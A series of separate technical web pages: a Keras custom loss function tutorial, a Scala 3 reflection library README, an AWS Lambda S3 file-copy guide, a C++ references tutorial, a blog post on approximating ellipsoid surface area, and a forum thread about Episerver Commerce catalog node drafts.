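        signed = [2 * t - 1 for t in row_t]            # 0 -> -1, 1 -> +1
        vals = [max(1 - t * p, 0.0) for t, p in zip(signed, row_p)]
        per_sample.append(sum(vals) / len(vals))
    return sum(per_sample) / len(per_sample)

y_true = [[0., 1.], [0., 0.]]
y_pred = [[0.6, 0.4], [0.4, 0.6]]
print(hinge(y_true, y_pred))  # ≈ 1.3
```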
These built-in loss functions are enough for most typical tasks, such as classification or regression. But there are some tasks which cannot be performed well using these built-in loss functions and require a loss that is more suitable for the task. For that purpose, a custom loss function is designed that calculates the error between the predicted value and the actual value based on custom criteria.

Why you should use a Custom Loss

Deep learning is a very active research field, and various industries use it to solve complex scenarios. There is a lot of research on how to perform specific tasks using deep learning. For example, there is a task of generating different food recipes from a picture of the food; on Papers with Code (a famous site for deep learning and machine learning research papers), there are many research papers on this topic. Imagine you are reading a research paper where the researchers decided that cross-entropy, mean squared error, or whatever the usual loss function is for that type of problem is not good enough, and modified it according to their needs. This may involve adding new parameters, or a whole new technique, to achieve better results. Now when you implement that problem, or hire data scientists to solve it for you, you may find that it is best solved using a specific loss function that is not available by default in Keras, and you need to implement it yourself. A custom loss function can improve the model's performance significantly, and can be really useful in solving specific problems.

To create a custom loss, you have to take care of some rules:

1. The loss function must take exactly two arguments, the true labels and the predicted labels, because these two values are needed to calculate the prediction error.
These arguments are passed from the model itself when the model is being fitted. For example:

def customLoss(y_true, y_pred):
    ...
    return loss

model.compile(loss=customLoss, optimizer='sgd')

2. Make sure that you use y_pred, the predicted value, in the loss function; if you do not, the gradient expression is not defined with respect to the model outputs, and training can throw an error.

3. You can then use it in model.compile just like any other loss function.

Example: Let's say you want to perform a regression task using a custom loss function that divides the Mean Squared Error value by 10. Mathematically, it can be denoted as:

loss = MSE(y, ŷ) / 10

To implement it in Keras, define a custom loss function with two parameters, the true and predicted values, perform the computation, and return the loss value. Note that Keras backend functions and TensorFlow mathematical operations are used instead of numpy functions to avoid some silly errors. Keras backend functions work similarly to numpy functions.

import keras
import keras.backend as K
import numpy as np
from tensorflow.python.ops import math_ops

def custom_loss(y_true, y_pred):
    diff = math_ops.squared_difference(y_pred, y_true)  # squared difference
    loss = K.mean(diff, axis=-1)  # mean over last dimension
    loss = loss / 10.0
    return loss

Here you can see a custom function with 2 parameters, the true and predicted values. The first step is to calculate the squared difference between the predicted and true labels using the squared_difference function from the TensorFlow Python ops. Then the mean is taken to complete the mean squared error, and the result is divided by 10 to complete the algorithm; the loss value is then returned. You can use it in a deep learning model by compiling the model and setting the loss function to the custom loss defined above.
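As a plain-Python sanity check of the same arithmetic (no Keras, toy numbers), the MSE-divided-by-10 loss is just:

```python
# Custom loss: mean squared error divided by 10.

def custom_loss_plain(y_true, y_pred):
    diff = [(t - p) ** 2 for t, p in zip(y_true, y_pred)]
    return (sum(diff) / len(diff)) / 10.0

print(custom_loss_plain([10.0, 7.0], [8.0, 6.0]))  # (4 + 1) / 2 / 10 = 0.25
```

The same inputs fed to the Keras version should produce the same value.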
model = keras.Sequential([
    keras.layers.Dense(10, activation='relu', input_shape=(1,)),
    keras.layers.Dense(1)
])

model.compile(loss=custom_loss, optimizer='sgd')

X_train = np.array([[10.0], [20.0], [30.0], [40.0], [50.0], [60.0], [10.0], [20.0]])
y_train = np.array([6.0, 12, 18, 24, 30, 36, 6, 12])  # dummy data

model.fit(X_train, y_train, batch_size=2, epochs=10)

Passing multiple arguments to a Keras loss function

Now, in the above formula the MSE is divided by 10. If you instead want to divide it by any value given by the user, you need to create a wrapper function that takes those extra parameters. A wrapper function, in short, is a function whose job is to call another function, with little or no additional computation. The additional parameters are passed to the wrapper function, while the main 2 parameters stay on the inner loss function. Let's see it in code.

def wrapper(param1):
    def custom_loss_1(y_true, y_pred):
        diff = math_ops.squared_difference(y_pred, y_true)  # squared difference
        loss = K.mean(diff, axis=-1)  # mean
        loss = loss / param1
        return loss
    return custom_loss_1

To do the standalone computation, first create the inner loss function by calling the wrapper, then pass y_true and y_pred to it.

loss = wrapper(10.0)
final_loss = loss(y_true=[[10.0, 7.0]], y_pred=[[8.0, 6.0]])
print(f"Final Loss is {final_loss.numpy()}")

You can use it in deep learning models by calling the wrapper with an appropriate value for param1.

model1 = keras.Sequential([
    keras.layers.Dense(10, activation='relu', input_shape=(1,)),
    keras.layers.Dense(1)
])

model1.compile(loss=wrapper(10.0), optimizer='sgd')

Here the model has been compiled using the value 10.0 for param1. The model can now be trained and the results can be seen.
model1.fit(X_train, y_train, batch_size=2, epochs=10)

Creating Custom Losses for Layers

Loss functions applied to the output of the model (i.e. what you have seen till now) are not the only way to compute losses. Custom losses for custom layers or subclassed models can be computed for quantities that you want to minimize during training, like regularization losses. These losses are added using the add_loss() method of keras.layers.Layer. For example, if you want to add a custom L2-style activity regularization to a layer, the penalty is:

loss = rate · Σ x²

You can create your own custom regularizer class, which should inherit from keras.layers.Layer.

import keras
from keras.layers import Layer
from tensorflow.math import reduce_sum, square

class MyActivityRegularizer(Layer):
    def __init__(self, rate=1e-2):
        super(MyActivityRegularizer, self).__init__()
        self.rate = rate

    def call(self, inputs):
        self.add_loss(self.rate * reduce_sum(square(inputs)))
        return inputs

Now, since the regularization loss has been defined, you can add it to any built-in layer, or create your own layer:

class SparseMLP(Layer):
    """Stack of Dense layers with our custom regularization loss."""

    def __init__(self, output_dim):
        super(SparseMLP, self).__init__()
        self.dense_1 = keras.layers.Dense(32, activation='relu')
        self.regularization = MyActivityRegularizer(1e-2)
        self.dense_2 = keras.layers.Dense(output_dim)

    def call(self, inputs):
        x = self.dense_1(inputs)
        x = self.regularization(x)
        return self.dense_2(x)

Here a custom sparse MLP layer has been defined: between the two Dense layers, the custom regularization loss is added, which will penalize large activations of the model. It can be tested:

mlp = SparseMLP(1)
y = mlp(np.random.normal(size=(10, 10)))
print(mlp.losses)  # list containing one float32 scalar tensor

mlp.losses is a list of tf.Tensor objects; an individual value can be converted to numpy with mlp.losses[0].numpy().

Dealing with NaN in Custom Loss in Keras

There are many reasons why a loss function in Keras can produce NaN values. If you are new to Keras or practical deep learning, this can be very annoying, because you have no idea why Keras is not giving the desired output. Since Keras is a high-level API built over lower-level frameworks such as Theano and TensorFlow, it can be difficult to pin down the problem.
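The regularization penalty itself is simple arithmetic. Here is a plain-Python version of the rate · Σx² term the regularizer adds, with made-up activations:

```python
# Activity regularization penalty: rate * sum of squared activations.

def activity_penalty(activations, rate=1e-2):
    return rate * sum(a * a for a in activations)

acts = [1.0, -2.0, 3.0]
print(activity_penalty(acts))  # 0.01 * (1 + 4 + 9) = 0.14
```

During training this value is added to the main loss, so the optimizer is pushed toward smaller activations as well as a better fit.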
There are many different reasons why people have received NaN in their loss, like the ones shown in the figure below. Some of the most common are as follows:

1. Missing values in the training dataset

This is one of the most common reasons why the loss becomes NaN while training. You should remove all the missing values from your dataset, or fill them using a good strategy, such as filling with the mean. You can check for NaN values using NumPy:

print(np.any(np.isnan(X_test)))

And if there are any missing values, you can either use the pandas fillna() function to fill them, or the dropna() function to drop them.

2. Loss is unable to get traction on the training dataset

This means that the custom loss function you designed is not suitable for the dataset and the business problem you are trying to solve. You should look at the problem from another perspective and try to find a more suitable loss function.

3. Exploding gradients

Exploding gradients is a very common problem, especially in large neural networks, where the values of your gradients become very large. This problem can be mitigated using gradient clipping. In Keras, you can add gradient clipping to your model when compiling it by adding the parameter clipnorm=x to the chosen optimizer; this clips all gradients whose norm exceeds the value x. For example:

opt = keras.optimizers.Adam(clipnorm=1.0)

This will clip all gradients with a norm greater than 1.0. You can add it to your model as:

model.compile(loss=custom_loss, optimizer=opt)

Using the RMSProp optimizer with heavy regularization also helps diminish the exploding gradients problem.

4. Dataset is not scaled

Scaling and normalizing the dataset is important. Unscaled data can lead the neural network to behave very strangely, hence it is advised to properly scale the data.
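As a minimal plain-Python illustration of what scaling does (min-max scaling to [0, 1], and standardization to zero mean and unit variance; toy numbers, no sklearn involved):

```python
import math

# Min-max scaling squeezes values into [0, 1];
# standardization recenters to mean 0 and scales to unit variance.

def min_max_scale(xs):
    lo, hi = min(xs), max(xs)
    return [(x - lo) / (hi - lo) for x in xs]

def standardize(xs):
    mean = sum(xs) / len(xs)
    var = sum((x - mean) ** 2 for x in xs) / len(xs)
    return [(x - mean) / math.sqrt(var) for x in xs]

data = [10.0, 20.0, 30.0, 40.0]
print(min_max_scale(data))  # [0.0, 0.33..., 0.66..., 1.0]
print(standardize(data))    # centered around 0
```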
There are 2 commonly used scaling methods, and both of them are easily available in sklearn, a famous machine learning library in Python:

1. StandardScaler
2. MinMaxScaler

5. Dying ReLU problem

A dead ReLU happens when the ReLU function always outputs the same value (0, mostly). This means that it takes no part in discriminating between the inputs. Once a ReLU reaches this state, it is unrecoverable, because the function's gradient at 0 is also 0, so gradient descent will not change the weights and the model will not improve. This can be improved by using the Leaky ReLU activation function, where there is a small positive gradient for negative inputs, e.g. y = 0.01x when x < 0. Hence, it is advised to use Leaky ReLU to avoid NaNs in your loss. In Keras, you can add a Leaky ReLU layer as follows:

keras.layers.LeakyReLU(alpha=0.3)

6. Not a good choice of optimizer function

If you are using stochastic gradient descent, it is quite likely that you will face the exploding gradients problem. One way to tackle it is by scheduling the learning rate after some epochs, but it has since been shown that with a per-parameter adaptive learning rate algorithm like the Adam optimizer, you no longer need to schedule the learning rate. So there is a chance that you are simply not using the right optimizer function. To use the Adam optimizer in Keras, use keras.optimizers:

keras.optimizers.Adam(
    learning_rate=0.001,
    beta_1=0.9,
    beta_2=0.999,
    epsilon=1e-07,
    amsgrad=False,
    name="Adam",
)

model.compile(optimizer=keras.optimizers.Adam(), loss=custom_loss)

7. Wrong activation function

The wrong choice of activation function can also lead to very strange behaviour of a deep learning model.
For example, if you are working on a multi-class classification problem and use the relu or sigmoid activation function in the final layer instead of softmax (paired with the categorical_crossentropy loss), the model can behave very weirdly.

8. Low Batch Size

It has been observed that optimizers are less stable on a very low batch size, such as 16 or 32, than on a batch size of 64 or 128.

9. High Learning Rate

A high learning rate can cause the model to overshoot and never converge to an optimum, getting lost somewhere in between. Hence it is advisable to use a lower learning rate. It can also be improved using hyper-parameter tuning.

10. Different file type (for NLP Problems)

If you are working on a textual problem, you can check your file type by running the following command.

Linux: $ file -i {input}
OSX: $ file -I {input}

This will give you the file type. If that file type is ISO-8859-1 or us-ascii, try converting the file to utf-8 or utf-16le.

Monitoring Keras Loss using Callbacks

It is important to monitor your loss while you train the model, so that you can understand the different kinds of behaviour your model is showing. Keras provides many callbacks with which you can monitor the loss. Some of the well-known ones are:

1. CSVLogger

CSVLogger is a callback provided by Keras that saves each epoch's results to a CSV file, so that later on they can be visualized, mined for information, and stored. You can use CSVLogger from keras.callbacks:

from keras.callbacks import CSVLogger

csv_logger = CSVLogger('training.csv')
model.fit(X_train, Y_train, callbacks=[csv_logger])

This fits the model on the dataset and stores the callback information in a training.csv file, which you can load into a dataframe and visualize.

2. TerminateOnNaN

Imagine you set the training limit of your model to 1000 epochs, and your model starts showing NaN loss.
You cannot just sit and stare at the screen while the progress stays at 0. Keras provides a TerminateOnNaN callback that terminates the training whenever a NaN loss is encountered.

import keras

terNan = keras.callbacks.TerminateOnNaN()
model.fit(X_train, Y_train, callbacks=[terNan])

3. RemoteMonitor

RemoteMonitor is a powerful callback in Keras, which can help us monitor and visualize the learning in real time. To use this callback, you need to clone hualos by François Chollet, the creator of Keras.

git clone
cd hualos
python api.py

Now you can access hualos at localhost:9000 from your browser. Then define the callback and add it to your model while training:

monitor = RemoteMonitor()
hist = model.fit(train_X, train_Y, nb_epoch=50, callbacks=[monitor])

During training, localhost:9000 is updated automatically, and you can see the visualizations of the learning in real time.

4. EarlyStopping

EarlyStopping is a very useful callback provided by Keras, with which you can stop the training earlier than planned based on some monitored value. For example, say you set your epochs to 100 and your model stops improving after the 10th epoch. You cannot sit and stare at the screen until the model finishes training before you change its architecture. Keras provides the EarlyStopping callback, which stops the training based on some criteria:

es = keras.callbacks.EarlyStopping(
    monitor="val_loss",
    patience=3,
)

Here the EarlyStopping callback has been defined, and the monitor has been set to the validation loss. If the validation loss does not improve for 3 epochs, training stops.
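To make the patience behaviour concrete, here is a stripped-down stand-in for the monitoring logic. This is a sketch of the idea only, not Keras's actual implementation:

```python
class EarlyStoppingSketch:
    """Mimics the patience logic of keras.callbacks.EarlyStopping."""

    def __init__(self, patience=3):
        self.patience = patience
        self.best = float("inf")
        self.wait = 0

    def should_stop(self, val_loss):
        # Reset the counter on any improvement; otherwise count the
        # epochs without improvement and stop once patience runs out.
        if val_loss < self.best:
            self.best = val_loss
            self.wait = 0
            return False
        self.wait += 1
        return self.wait >= self.patience

es = EarlyStoppingSketch(patience=3)
for epoch, loss in enumerate([1.00, 0.80, 0.90, 0.85, 0.88]):
    if es.should_stop(loss):
        print(f"stopping at epoch {epoch}")  # third epoch without improvement
        break
```

With the loss sequence above, the best value 0.80 is never beaten again, so the loop stops after three non-improving epochs.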
This article should give you good foundations for dealing with loss functions, especially in Keras: implementing custom loss functions (ones you develop yourself, or ones a researcher has already developed) in a deep learning framework, avoiding silly errors such as repeated NaNs in your loss, and monitoring your loss function in Keras. Hopefully, you now have a good grip on these topics:

- What are Loss Functions?
- What are Evaluation Metrics?
- Commonly used Loss functions in Keras (Regression and Classification)
- Built-in loss functions in Keras
- What is a custom loss function?
- Why should you use a Custom Loss?
- Implementation of common loss functions in Keras
- Custom Loss Functions for Layers, i.e. Custom Regularization Loss
- Dealing with NaN values in Keras Loss
- Monitoring Keras Loss using callbacks
https://cnvrg.io/keras-custom-loss-functions/
Scala Reflection

Scala 3 introduced many exciting new language features, and broke one old one. Scala 2's runtime reflection has been eliminated in favor of using compile-time macros to reflect on classes. This approach is a mixed blessing. If the type you want to reflect on is known at compile-time then performance of this new mechanism is very fast, however if you only know the reflected type at run-time you're basically out of luck.

Well... not entirely out of luck. Scala 3 offers something called Tasty Inspection that can reflect on a run-time type but at a severe performance penalty, as this approach involves file IO to read your class' .tasty file. Tasty Inspection works, but it is orders of magnitude slower than Scala 2 run-time reflection.

The scala-reflection project seeks to accomplish two goals:

- Make Scala 3 reflection a little more approachable by exposing higher-level abstractions for reflected things, vs using macros to dive through Scala 3 internals
- Allow for a true, performant, runtime reflection capability

That second goal, runtime reflection, poses a unique challenge. Just how do you provide a runtime reflection ability in a language that doesn't have that facility? How, indeed! The solution offered by this library is to provide a compiler plugin for your code. What the plugin does is capture reflected information on all your compiled classes at compile-time and serialize it into annotations readable at runtime. In principle, this isn't dissimilar from how Scala 2 runtime reflection works. Use of the compiler plugin is optional, but highly recommended as it avoids the very costly file IO for runtime reflection.

The results speak for themselves. Here's a sample of using scala-reflection on a few complex test classes in non-plugin mode and as a compiler plug-in:

Everything will still work fine if you elect not to use the plugin, or if you encounter classes that weren't compiled using the plugin.
Performance will just be slower the first time a class is reflected upon. (The library caches, so subsequent reflection on an already-seen class is 1-2 ms.) You can see from this chart that for these results the compiler plug-in is offering more than an order of magnitude improvement.

Configuration

In your build.sbt file, be sure you've set co.blocke's releases repo in bintray as a resolver, and add the current version of the library to libraryDependencies:

libraryDependencies += "co.blocke" %% "scala-reflection" % CURRENT_VERSION

(The CURRENT_VERSION value can be taken from the 'maven central' badge in this github repo.)

To use the compiler plugin mode (recommended) add this to your project's build.sbt:

addCompilerPlugin("co.blocke" %% "scala-reflection" % CURRENT_VERSION)

For best results compile all classes you intend to reflect on with this plugin enabled.

Standard Usage

This library defines a set of "Info" classes, which are high-level abstractions representing reflected information about various Scala classes and structures. Reflect on a class like this:

import co.blocke.scala_reflection

case class Thing(a: String)

// >> Compile-time reflection using square brackets for type
val macroRType: RType = RType.of[Thing]  // returns ScalaCaseClassInfo

// >> Run-time reflection using parentheses for type (will use compiler-plugin if enabled)
val cname: String = getClassWeNeedFromSomewhere()
val runtimeRType: RType = RType.of(Class.forName(cname))

In the second example you don't know the actual type of the class to reflect on until runtime, for example if it came from an external source like a REST call. If you're using the compiler plugin, the pre-reflected ScalaCaseClassInfo will be returned immediately; otherwise file IO will read your class' .tasty file and reflect on the class, which is very slow the first time we encounter this class (cached after that).
Resolving Generic Classes using Traits

The scala-reflection library was first envisioned to facilitate migrating ScalaJack serialization to Scala 3. One of ScalaJack's key features is its trait handling ability.

trait Pet[T] {
  val name: String
  val numLegs: Int
  val special: T
}

case class Dog[T](name: String, numLegs: Int, special: T) extends Pet[T]
case class Fish[T](name: String, numLegs: Int, special: T) extends Pet[T]

val pet: Pet[Boolean] = Dog("Spot", 4, true)

When serializing pet, ScalaJack would generate JSON with a type hint like this:

{"_hint":"com.mystuff.Dog","name":"Spot","numLegs":4,"special":true}

The hint tells ScalaJack which specific Pet class to materialize upon reading this JSON (we're expecting only a Pet). So... you'll see here we just have a class name in the hint. How do we know the type of T? We're going to have to tell it:

scalajack.read[Pet[Boolean]](js)

Pet[Boolean] is a parameterized trait. We get the concrete class value "com.mystuff.Dog" from the JSON. We need to resolve Dog in terms of Pet[Boolean] to find the correct type of 'special'. We accomplish this feat in scala-reflection like this:

val resolved = RType.inTermsOf[Pet[Boolean]](Class.forName("com.mystuff.Dog"))

This will return a ScalaCaseClassInfo with field 'special' correctly typed to Boolean, which it learned about by studying the specific Pet trait you gave it in the square brackets.
Here's what the process looks like internally:

RType.of[Pet[Boolean]]:

TraitInfo(com.foo.Pet) actualParamTypes: [
  T: scala.Boolean
] with fields:
  name: java.lang.String
  numLegs: scala.Int
  special[T]: scala.Boolean

RType.of(Class.forName("com.foo.Dog")):

ScalaCaseClassInfo(com.foo.Dog):
fields:
  (0) name: java.lang.String
  (1) numLegs: scala.Int
  (2)[T] special: scala.Any

RType.inTermsOf[Pet[Boolean]](Class.forName("com.foo.Dog")):

ScalaCaseClassInfo(com.foo.Dog):
fields:
  (0) name: java.lang.String
  (1) numLegs: scala.Int
  (2)[T] special: scala.Boolean

If, for any reason, you wish NOT to have scala-reflection examine a class, you may annotate that class with @Skip_Reflection and scala-reflection will return an RType of UnknownInfo.

Learning to Drive with Macros

scala-reflection uses macros to the fullest extent possible to do the hard work of reflecting on types. Macros impact the compile/test cycle in ways that are non-intuitive at first. Think of this example:

// File1.scala
case class Foo(name: String)

// File2.scala
val fooRType = RType.of[Foo]

In a non-macro implementation (e.g. Scala 2 runtime reflection), if you update Foo in File1.scala you naturally expect sbt to re-compile this file, and anything that depends on Foo, and the changes will be picked up in your program, and all will be well. That's not necessarily what happens with macros!

Remember that the macro code is run at compile-time. File2.scala needs to be re-compiled because the RType.of macro needs to be re-run to pick up your changes to the Foo class in File1.scala. Unfortunately sbt doesn't pick up this dependency! If you don't know any better you'll just re-run your program after a change to File1.scala, like normal, and get a spectacular exception with exotic errors that won't mean much to you. The solution is that you need to also recompile File2.scala.
This means you will be doing more re-compiling with macro-based code than you would without the macros. It's an unfortunate cost of inconvenience and time, but the payoff is a dramatic gain in speed at runtime, and in the case of reflection in Scala 3, using macros is really the only way to accomplish reflection.

Status

At this point the library can reflect on quite a lot of things in the Scala ecosystem:

- Scala 3 Tasty classes (parameterized or non-parameterized) w/annotations
- Traits (including sealed traits)
- Scala 2 case classes
- Value Classes
- Java classes (JavaBeans pattern)
- Scala 3 enum / Scala 2 Enumeration
- Scala 3 Union & Intersection types
- Opaque type aliases
- Try typed fields
- Either
- Option and Java Optional
- Collections, incl. several Java Collections
- Tuples

See unit tests for detailed examples of usage.

Limitations

- No support for parameters in Intersection or Union types (val t: X|Y or val u: X&Y). This is because union/intersection types don't appear to be implemented as full classes in Scala and we haven't yet figured out how this would work in scala-reflection.
- The entire serialized RType tree (incl. any nested RTypes) must not exceed 64K bytes. This is so that it will fit into a JVM Annotation. (If this becomes a frequent show-stopper, there may be a way to extend this limitation, but we have no desire to prematurely over-engineer. Until we learn otherwise, 64K seems a reasonable amount.)

Acknowledgements

I wish to thank three people who have helped make this library possible, with their patient explanations and help on gitter. Learning the Scala 3 reflection internals was certainly a learning curve for me and these guys really helped me through it:

- Guillaume Martres (@smarter)
- Paolo G. Giarrusso (@Blaisorblade)
- Nicolas Stucki (@nicolasstucki)

Release Notes:

- 1.0.0 - First GA release
- 1.0.0-RC2 - Match compatibility with Scala 3 RC2
- 1.0.0-M2 - Initial release for Scala 3.0.0-M2
https://index.scala-lang.org/gzoller/scala-reflection/scala-reflection/1.0.0?target=_3.x
AWS Lambda is a serverless, event-driven compute service. Serverless does not mean there are no servers. It means you don't manage or provision them; someone else does that job for you. Event-driven means it uses events to trigger and communicate between services. When using Lambda you just write the function and AWS manages the rest for you. It is integrated with many programming languages, such as Python, Node.js, Java, C#, and Golang, so you can pick the language you prefer. It is that flexible.

Amazon S3 is a cloud object storage service. S3 allows you to store objects in what they call "buckets". A bucket is like a directory. It can be created in a particular region, but S3 bucket names are unique globally. When I said it is *like* a directory, I meant it, because inside a bucket there are no folders. It has a logical arrangement similar to folders, separated by "/". Bucket objects, or files, are always referenced by a key. The key is the full path within the bucket.

This is a simple activity you can try in AWS. Here you'd be using two AWS services: Lambda and S3.

As the first task, let's copy a file within the same S3 bucket. The code is simple. Create the S3 bucket and add an object. I assume that you have an object called "script.py" at the following source path, so the object key is "source/script.py" (the bucket name is not part of the key, as the code below shows):

mybucket1/source/script.py

You want the destination path to be:

mybucket1/destination/script.py

Create a Lambda function in the same region as the bucket.

import boto3

def lambda_handler(event, context):
    # Creating the connection with the resource
    s3 = boto3.resource('s3')
    # Declaring the source to be copied
    copy_source = {'Bucket': 'mybucket1', 'Key': 'source/script.py'}
    bucket = s3.Bucket('mybucket1')
    # Copying the file to another folder
    bucket.copy(copy_source, 'destination/scriptCopy.py')

Paste the above code and deploy it.
Save and Deploy Lambda Function

When you create a Lambda function, it creates an execution role with basic permissions (if you did not change anything). Make sure the Lambda function's IAM role has the following permissions before you test the function. Go to Configuration -> Permissions and open the execution role.

IAM Role Lambda Function

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:GetBucketLocation"
            ],
            "Resource": [
                "arn:aws:s3:::mybucket1/*",
                "arn:aws:s3:::mybucket1"
            ]
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3-object-lambda:GetObject",
                "s3-object-lambda:PutObject"
            ],
            "Resource": "arn:aws:s3-object-lambda:Region:AccountID:accesspoint/*"
        }
    ]
}

As the second task, let's copy a file from one S3 bucket to another S3 bucket. The code is simple; you only have to update one line:

bucket = s3.Bucket('mybucket2')

Update the correct permissions for the other bucket too.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:GetBucketLocation"
            ],
            "Resource": [
                "arn:aws:s3:::mybucket1/*",
                "arn:aws:s3:::mybucket1",
                "arn:aws:s3:::mybucket2/*",
                "arn:aws:s3:::mybucket2"
            ]
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3-object-lambda:GetObject",
                "s3-object-lambda:PutObject"
            ],
            "Resource": "arn:aws:s3-object-lambda:Region:AccountID:accesspoint/*"
        }
    ]
}

That's all! Hope this helps. Thank you for reading.
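As a wrap-up, the second task can be sketched as a single handler. The dest_key helper is illustrative, not code from the article, and boto3 is imported inside the handler (it is available in the Lambda runtime) so the pure helper can be exercised without AWS credentials:

```python
def dest_key(src_key, src_prefix="source/", dst_prefix="destination/"):
    # Keys are plain strings -- "folders" are just a naming convention --
    # so deriving the destination key is ordinary string manipulation.
    if not src_key.startswith(src_prefix):
        raise ValueError(f"unexpected key: {src_key}")
    return dst_prefix + src_key[len(src_prefix):]

def lambda_handler(event, context):
    import boto3  # provided by the Lambda runtime
    s3 = boto3.resource("s3")
    src_key = "source/script.py"
    copy_source = {"Bucket": "mybucket1", "Key": src_key}
    # Copy across buckets (task 2); use "mybucket1" here for task 1.
    s3.Bucket("mybucket2").copy(copy_source, dest_key(src_key))
```

The same IAM permissions shown above still apply: the role needs read access on the source bucket and write access on the destination bucket.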
https://plainenglish.io/blog/how-to-copy-a-file-using-aws-lambda
A reference variable is an alias, that is, another name for an already existing variable. Once a reference is initialized with a variable, either the variable name or the reference name may be used to refer to the variable. References are often confused with pointers, but there are three major differences between references and pointers:

- You cannot have NULL references. A reference must always be connected to a legitimate piece of storage.
- Once a reference is initialized to an object, it cannot be changed to refer to another object. A pointer can be pointed at another object at any time.
- A reference must be initialized when it is created. A pointer can be initialized at any time.

Consider a variable:

int i = 17;

We can declare a reference variable for i as follows:

int& r = i;

and, similarly, a reference to a double:

double d = 11.7;
double& s = d;

Read the & in these declarations as reference. Thus, read the first declaration as "r is an integer reference initialized to i" and read the second declaration as "s is a double reference initialized to d."

The following example makes use of references on int and double:

#include <iostream>
using namespace std;

int main () {
   // declare simple variables
   int i;
   double d;

   // declare reference variables
   int& r = i;
   double& s = d;

   i = 5;
   cout << "Value of i : " << i << endl;
   cout << "Value of i reference : " << r << endl;

   d = 11.7;
   cout << "Value of d : " << d << endl;
   cout << "Value of d reference : " << s << endl;

   return 0;
}

When the above code is compiled and executed, it produces the following result:

Value of i : 5
Value of i reference : 5
Value of d : 11.7
Value of d reference : 11.7

References are usually used for function argument lists and function return values. These are two important subjects related to C++ references which should be clear to a C++ programmer: references as parameters, and references as return values.
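To make the "function argument lists" use concrete, here is a classic swap written with reference parameters. This example is an addition, not part of the original tutorial:

```cpp
#include <cassert>  // assert() is used when exercising the example

// Because x and y are reference parameters, swap_ints operates on the
// caller's variables directly -- no pointers or dereferencing needed.
void swap_ints(int& x, int& y) {
    int tmp = x;
    x = y;
    y = tmp;
}
// Usage:
//   int i = 5, j = 9;
//   swap_ints(i, j);   // now i is 9 and j is 5
```

Had the parameters been plain ints, the function would have swapped private copies and the caller's variables would be untouched.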
https://www.tutorialspoint.com/cplusplus/cpp_references.htm
After writing the previous post, I wondered where else you might be able to use r-means to create accurate approximations. I thought maybe this would apply to the surface area of an ellipsoid, and a little searching around showed that Knud Thomsen thought of this in 2004.

The general equation for the surface of an ellipsoid is

x²/a² + y²/b² + z²/c² = 1.

If two of the denominators {a, b, c} are equal then there are formulas for the area in terms of elementary functions. But in general, the area requires special functions known as "incomplete elliptic integrals." For more details, see this post.

Here I want to focus on Knud Thomsen's approximation for the surface area and its connection to the previous post.

The previous post reported that the perimeter of an ellipse is 2πr where r is the effective radius. An ellipse doesn't have a radius unless it's a circle, but we can define something that acts like a radius by defining it to be the perimeter over 2π. It turns out that the r-mean with r = 3/2, M_{3/2}(x), makes a very good approximation for the effective radius, where x = (a, b). Here

M_r(x) = ((x₁^r + x₂^r + … + x_n^r)/n)^(1/r),

using the notation of Hardy, Littlewood, and Pólya.

This suggests we define an effective radius for an ellipsoid and look for an approximation to the effective radius in terms of an r-mean. The area of a sphere is 4πr², so we define the effective radius of an ellipsoid as the square root of its surface area divided by 4π. So the effective radius of a sphere is its radius.

Thomsen found that

(effective radius)² ≈ M_p(x)

where x = (ab, bc, ac) and p = 1.6. More explicitly,

area ≈ 4π (((ab)^p + (bc)^p + (ac)^p)/3)^(1/p).

Note that it's the square of the effective radius that is an r-mean, and that the argument to the mean is not simply (a, b, c). I would have naively tried looking for a value of p so that the r-mean of (a, b, c) gives a good approximation to the effective radius. In hindsight, it makes sense in terms of dimensional analysis that the inputs to the mean have units of area, and so the output has units of area.

The maximum relative error in Thomsen's approximation is 1.178% with p = 1.6.
You can tweak the value of p to reduce the worst-case error, but the value of 1.6 is optimal for approximately spherical ellipsoids.

For an example, let's compute the surface area of Saturn, the planet with the largest equatorial bulge in our solar system. Saturn is an oblate spheroid with equatorial diameter about 11% greater than its polar diameter.

Assuming Saturn is a perfect ellipsoid, Thomsen's approximation over-estimates its surface area by about 4 parts per million. By comparison, approximating Saturn as a sphere under-estimates its area by 2 parts per thousand. The code for these calculations, based on the code here, is given at the bottom of the post.

Appendix: Python code

from numpy import pi, sin, cos, arccos
from scipy.special import ellipkinc, ellipeinc

# Saturn in km
equatorial_radius = 60268
polar_radius = 54364

a = b = equatorial_radius
c = polar_radius

phi = arccos(c/a)
m = 1
temp = ellipeinc(phi, m)*sin(phi)**2 + ellipkinc(phi, m)*cos(phi)**2
ellipsoid_area = 2*pi*(c**2 + a*b*temp/sin(phi))

def rmean(r, x):
    n = len(x)
    return (sum(t**r for t in x)/n)**(1/r)

approx_ellipsoid_area = 4*pi*rmean(1.6, (a*b, b*c, a*c))

r = (a*b*c)**(1/3)
sphere_area = 4*pi*r**2

def rel_error(exact, approx):
    return (exact - approx)/approx

print( rel_error(ellipsoid_area, sphere_area) )
print( rel_error(ellipsoid_area, approx_ellipsoid_area) )
https://www.johndcook.com/blog/2021/03/24/surface-area-ellipsoid/
Hi,

This is indeed an interesting case. For Commerce 9+ the unpublished node might not be in the CatalogNode table, and therefore referenceConverter.GetContentLink(code) does not return it. I'll file a bug to see if we should do something about this - but no promise that it'll be fixed.

Regards,
/Q

Hi,

I had time to check this issue today, and it seems that for an entirely new node or entry, that code should still work (the data is saved to the CatalogNode/CatalogEntry table). However, if you have a published node and then create a draft version of it, then it does not work - is that the scenario you mentioned?

/Q

Hi,

Yes, I think the issue has to do with the draft version. I just did some testing on my own and this is the problem:

I create a new node and save it. The node gets the code "Gratis_1". I look in the CatalogNode table where Code = 'Gratis_1' and I get a hit. So far all good. Now I change the code to "123456", but the node in the CatalogNode table is not updated. I still find a row with Code = 'Gratis_1' but no node with '123456'. I then publish the node, and then I find a node with the code '123456'.

